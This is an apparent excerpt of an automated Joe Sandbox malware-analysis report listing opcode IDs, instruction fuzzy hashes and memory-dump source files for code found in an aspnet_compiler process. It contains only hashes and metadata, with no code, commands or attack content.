                                                                                                        • Opcode ID: 1939cb56ec00819e0229f6b867d546bd84145b7a54f2e69b48e95c04e4724cc0
                                                                                                        • Instruction ID: c09819f51731907209ea4e64b2325f597921a0eeb56f8f4cdf490646c61850f2
                                                                                                        • Opcode Fuzzy Hash: 1939cb56ec00819e0229f6b867d546bd84145b7a54f2e69b48e95c04e4724cc0
                                                                                                        • Instruction Fuzzy Hash: F731D471A00616EFDB1A9FA9C850B6EB7B9AF84758F114069E505EB382DB30DC01CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4026a586d1b5abc87a677043370f1b3ba35f7e5c7c8ae0c5f2806733339a3dba
                                                                                                        • Instruction ID: f6b7ff84396962b05e4dc2efbc1d8ed3dddd141ce9277059deb0f01dd2ff17d9
                                                                                                        • Opcode Fuzzy Hash: 4026a586d1b5abc87a677043370f1b3ba35f7e5c7c8ae0c5f2806733339a3dba
                                                                                                        • Instruction Fuzzy Hash: 9A318C716093018FE769CF19C840B2AFBE5FB98710F05896DE9889B395D771E844CBA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                                        • Instruction ID: 3e0abc83f2c206ea32c17534cfebff3e103ac43937bc8e27a72b109b3a4304f0
                                                                                                        • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                                        • Instruction Fuzzy Hash: C631CC31600206CFC704CF1CC480916FBFAFF98318B2586AAE9589B355E731ED12CB91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 059ae904e084a35d814caf02967933c1ba69b477538e14dfb368989ecf47814c
                                                                                                        • Instruction ID: b03712ba13797338d6b7dee75a1b4ecdbc481de806ff12f473fc8cd163164efd
                                                                                                        • Opcode Fuzzy Hash: 059ae904e084a35d814caf02967933c1ba69b477538e14dfb368989ecf47814c
                                                                                                        • Instruction Fuzzy Hash: 1731D432B00205DFD728EFA8C984AAEBBFAAFC4708F008539D645D7A58D734D945CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                                        • Instruction ID: 1630c84190f67620831430215cdafa727fa0e582dc4c78c9bd3fa0f21aa2c2c5
                                                                                                        • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                                        • Instruction Fuzzy Hash: 57319CB260820A8FCB09DF28D84095ABBE9FF99314F01056AFC61D73A1D730DD11CBA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fa30deed080a61123e2db890cb2634e429af63332e565328c04cc4169d1d3f56
                                                                                                        • Instruction ID: 43debac71aa5f0d4305376c20475255c48de98906b76f0c5149290424374bc0c
                                                                                                        • Opcode Fuzzy Hash: fa30deed080a61123e2db890cb2634e429af63332e565328c04cc4169d1d3f56
                                                                                                        • Instruction Fuzzy Hash: A8318E716002108BDB39AF58DC40BA977B8FF50308F44C1A9DD859B346DB79DC92CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                        • Instruction ID: 1572081c0bd21cc3acc23a3377b08fee8cc337331563d45459b75eec2d584901
                                                                                                        • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                        • Instruction Fuzzy Hash: 0C21DE36600A52A6CB1D9B95C810BBAFB75EF60B14F40C41EFAA987D51E734DD50C7E0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f6e87c1760fd629674a21123ca88320bd59128d05a8e547a61f1d763f4b15373
                                                                                                        • Instruction ID: ecafa856b2a520d813ce82ca6927d1e022eea7e52e6a67cc0ecf517e46ceb68b
                                                                                                        • Opcode Fuzzy Hash: f6e87c1760fd629674a21123ca88320bd59128d05a8e547a61f1d763f4b15373
                                                                                                        • Instruction Fuzzy Hash: 7E31E431E0212C9BDB3A9F19CC41BEEB7B9EB15744F0208A1E655E72D0D7B49E808F91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                        • Instruction ID: 252926fd4fce614b9eb26487da5fd88b0e8cb7e7d5f270d790fb23cd0e7fee0f
                                                                                                        • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                        • Instruction Fuzzy Hash: CB217131A01609EBCB19CF58D980A9EBBB5FF48B14F108065EE159F641D771EA058B90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                        • Instruction ID: 2933b42b7c74af46af5606472028c39e30de422f24be658130f9bd1621949cb0
                                                                                                        • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                        • Instruction Fuzzy Hash: 4F31BE31A00605EFDB2ACF69C884F6ABBB9EF44314F1148A8E551CB281E770ED02CB50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a34480d0c7301f1a018a3d1edce29344b40809fb5dabfa4f0a060d56ae82f200
                                                                                                        • Instruction ID: a230236e2eceab092e8a29ff97f59cab6a0383837e2cffbcbd0d16117cf8c477
                                                                                                        • Opcode Fuzzy Hash: a34480d0c7301f1a018a3d1edce29344b40809fb5dabfa4f0a060d56ae82f200
                                                                                                        • Instruction Fuzzy Hash: DD2129715143119BCB2AFF68E944F1A7BE8FF64658F01091AFA149B191EB34D810CBA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                                        • Instruction ID: efe786cdfe116eba06b2737d9f7b18dee2d12d89ec1713fd6e3c75d9e516049a
                                                                                                        • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                                        • Instruction Fuzzy Hash: EB21CF72604206DFD71DCF19C440B66BBE9EF95364F15416DE10A8B290EBB0EC02CB95
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cbb7067e69b7e63aa49906ca90d4f5351a8849e70510649028cf542d9a6755ea
                                                                                                        • Instruction ID: 8b55134d3fe8ca03743c41fb0fc8701984f0f3b2d6669cab20723a97ff2d1afd
                                                                                                        • Opcode Fuzzy Hash: cbb7067e69b7e63aa49906ca90d4f5351a8849e70510649028cf542d9a6755ea
                                                                                                        • Instruction Fuzzy Hash: 8E21AB71600615ABDB19DB68C840A6AB7A8FF4C744F140069F914D7691E738ED10CB64
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b45bc79af7da1f9f937e4cabe6afd28145077281f73a444d809d42b3ee6a28b6
                                                                                                        • Instruction ID: 7ee4f76b9d5c9f01f6ff5f567d5677a0e3ee1eb3a05fee265136f03a333bd2e6
                                                                                                        • Opcode Fuzzy Hash: b45bc79af7da1f9f937e4cabe6afd28145077281f73a444d809d42b3ee6a28b6
                                                                                                        • Instruction Fuzzy Hash: BF21FB31A047418FC329DF7988C0BABB7E9AFD5218F14496DF8A6931C1DB70A9458792
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f8eb0b5f2313455e0721895c15ef74662b4c1bfd33e2d839ac75ffa745b8ad98
                                                                                                        • Instruction ID: 9024237f21bf5424ed07cc68e6693057654d115016f9b4ea55feeca097c5f59b
                                                                                                        • Opcode Fuzzy Hash: f8eb0b5f2313455e0721895c15ef74662b4c1bfd33e2d839ac75ffa745b8ad98
                                                                                                        • Instruction Fuzzy Hash: FE2125729083469FDB19EF59C804B6BBBDCAF99254F080456BDA4C7251D734DA04C6A2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                                        • Instruction ID: 40473e347330a31b1e2f090b332fe408243009caa0ecb3d070e2c0628dce3064
                                                                                                        • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                                        • Instruction Fuzzy Hash: 5A210472644700EBD719AF18DC42B5BBBA5FF88764F01412EF945973E0D730D8018BAA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 70fd1750640c7b97cf84ca09a514c648cbb5f5124e8376f0b55fafacb88c8e70
                                                                                                        • Instruction ID: 5bf75a797d30a5fc63011456eb88266f56311ce2cee7fe8778e3bdf71e0db750
                                                                                                        • Opcode Fuzzy Hash: 70fd1750640c7b97cf84ca09a514c648cbb5f5124e8376f0b55fafacb88c8e70
                                                                                                        • Instruction Fuzzy Hash: CD21A935250A119FC729DF29C800B56B7F5BF08B48F248568E50ACBB62E331E852CF94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                        • Instruction ID: 43ee3baf33598cfd8e371906983798ecef6064ce9c703e64963a8f2a1a12d12c
                                                                                                        • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                        • Instruction Fuzzy Hash: 1221AE76A00209EFDF168F98CC40BAEBBB9EF48311F200415F910A7251D734ED618B50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                                                        • Instruction ID: abfb49a25aaeb7e4904e46b941dbac7542f7a0cffa8ab1462e019eedd6412312
                                                                                                        • Opcode Fuzzy Hash: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                                                        • Instruction Fuzzy Hash: CE210171600685DBE72E8B59D844B697BF9AF44394F0E00A0ED068B392E728DC40C661
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                        • Instruction ID: bd4d55e47830693cdc72a0d7e3bfe7bec2ef5510a9b23818d0948fc10509648a
                                                                                                        • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                        • Instruction Fuzzy Hash: A411E272600605AFD72A9F55CC40FDABBB8EB84F58F110029F7048B180D771ED44CB50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 57ed8eaee5ba4c4273edf779ecc4aa861a45702f0b63e9e37e7b6ed3ddadbd66
                                                                                                        • Instruction ID: 2b095989fd55aa05104781d7894e23c8e6fa261ed0e6266043dd596e9ea80dbd
                                                                                                        • Opcode Fuzzy Hash: 57ed8eaee5ba4c4273edf779ecc4aa861a45702f0b63e9e37e7b6ed3ddadbd66
                                                                                                        • Instruction Fuzzy Hash: EF115572210251ABCF3BAB68EC04F2677A8FF95A78F204039FA144B292DB309811C790
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3ad34071de17a9abb68f3e8523d82afc4b5b5e37f8d3079143ff3f95e1968dc5
                                                                                                        • Instruction ID: 72b6ac73ca822b841683ad94191fe0a10355ed52282115bc2f8ab91977fb4fb4
                                                                                                        • Opcode Fuzzy Hash: 3ad34071de17a9abb68f3e8523d82afc4b5b5e37f8d3079143ff3f95e1968dc5
                                                                                                        • Instruction Fuzzy Hash: 74215B76A00206DFCB18CF98C581AAEFBF5FB89318F24816DD505AB315DB71AD06CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b71c222f22a4acd289ad85973926efc223905c47f64cc01e4a9d8c8b7c94af72
                                                                                                        • Instruction ID: b7c6f2595e0e325b7f050d4c4089097f35247def01b48d9757c5d5eefe93d64e
                                                                                                        • Opcode Fuzzy Hash: b71c222f22a4acd289ad85973926efc223905c47f64cc01e4a9d8c8b7c94af72
                                                                                                        • Instruction Fuzzy Hash: C911223A120606AED33BDF15F804A7237E8FBA8B84B104226E800C7296E739DD11CB24
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 64702a466876ed153a18fbc48e16923299a4ba64d06a21df1032805d09156e66
                                                                                                        • Instruction ID: 0c2c33d6aa3500918612327f0710a6ac6a948edc3e974273bc3317724fbae5e7
                                                                                                        • Opcode Fuzzy Hash: 64702a466876ed153a18fbc48e16923299a4ba64d06a21df1032805d09156e66
                                                                                                        • Instruction Fuzzy Hash: 3101497361025113DF3E55EDA884BAF7618EB956B4F1606A4FE244B242DB28DC5183E1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e487967c2704c12a178df319808cf28550309b9a894b6f9534a46c5c63bab985
                                                                                                        • Instruction ID: 4b01153b59efddcb0177efbd659749deec6ad3963a449a915498ac41d99356ee
                                                                                                        • Opcode Fuzzy Hash: e487967c2704c12a178df319808cf28550309b9a894b6f9534a46c5c63bab985
                                                                                                        • Instruction Fuzzy Hash: E501F972704701ABDB18AB7A9C80F6BB7F8DFD4618F040478E706C7241F770E9018665
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ad6869699e8de397052975676ec17f91e3fc29ac3fe73b649845545782252692
                                                                                                        • Instruction ID: 3d9611829a2393d649f76cd0b4f9acafdf9939569db9b1401302af1f82751c04
                                                                                                        • Opcode Fuzzy Hash: ad6869699e8de397052975676ec17f91e3fc29ac3fe73b649845545782252692
                                                                                                        • Instruction Fuzzy Hash: EC11A371904619DFE72ACF59C842B6777E8EB44304F018429EAC5CB291D775FC008B61
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                        • Instruction ID: 172db84bb8070e1ce3ee40b119c86147a5412daa4bb1b9f19c04d371552af6a7
                                                                                                        • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                        • Instruction Fuzzy Hash: 7311E5766127C79BE72F972CC944B263BE4EB40758F1A00A0EE5187787F328C843C252
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 984630caa42dc77993132bb1400f1e16a75a3ab08f505e1e4a71db1ca6fb4278
                                                                                                        • Instruction ID: fa78a62dc8c32e43662aa255788967e7b7a3dd222cbdacd3c9c5aacd9cf3cff8
                                                                                                        • Opcode Fuzzy Hash: 984630caa42dc77993132bb1400f1e16a75a3ab08f505e1e4a71db1ca6fb4278
                                                                                                        • Instruction Fuzzy Hash: 6D112571A0064DDBC729EF68C844BAEB7B8FF88744F540076E901E7646D739D902CB50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                                                        • Instruction ID: 6327869eed476dcceaca7f32a077f09c0b51ffee52b0d210ad4cc323e0bed74d
                                                                                                        • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                                                        • Instruction Fuzzy Hash: 6901B976140506FFE7199F56CC80E52FF6DFF547A4B400526F650435A0C732AC61C7A4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                        • Instruction ID: 0b469dff21424aac914f860f58d065c5c99ed81a8e02c0f1dbf3da8a04a8336f
                                                                                                        • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                        • Instruction Fuzzy Hash: BF0126318047299BCB3A8F59E840A727BB5EF557A0700853DFC958B2C1D331D400CB60
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 357d7c1624f5d48096ec40fb1871b4284a0be62422c8abaa6841f66810430d9a
                                                                                                        • Instruction ID: fec9249adf7a1d6e7ed499ffb1211b1b18821e7f46ea7800373f18684d03504b
                                                                                                        • Opcode Fuzzy Hash: 357d7c1624f5d48096ec40fb1871b4284a0be62422c8abaa6841f66810430d9a
                                                                                                        • Instruction Fuzzy Hash: A8118B32242241EFDB1AAF19C980F16BBB9FF58B58F2000A5E9059B6A1C335ED01CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c28bbfa26487a483ad24d145c9d45842e89998b7c2062814e1dd2799af7b44e5
                                                                                                        • Instruction ID: 20b9d81e74ff2a160df33316ec620755ba4c0a66e220d9a89c8d2e73956e2d5e
                                                                                                        • Opcode Fuzzy Hash: c28bbfa26487a483ad24d145c9d45842e89998b7c2062814e1dd2799af7b44e5
                                                                                                        • Instruction Fuzzy Hash: 82115A71541229EBDB69AB64CC42FE9B3B4AB08714F5041A4A728A61E0DB709E91CF84
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e2bf1701a3251d1f1a60adb226c86c3ba4e45d4237d31922c156460a8bb9015a
                                                                                                        • Instruction ID: 526af417507eea4f82cdc39d5f12dc2839a64460d64ed6b6f71e7df9a563c34b
                                                                                                        • Opcode Fuzzy Hash: e2bf1701a3251d1f1a60adb226c86c3ba4e45d4237d31922c156460a8bb9015a
                                                                                                        • Instruction Fuzzy Hash: 95111772900119EBCF1ADB94CC84DEFBB7CEF48258F044166E916A7211EB34AA15CBA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
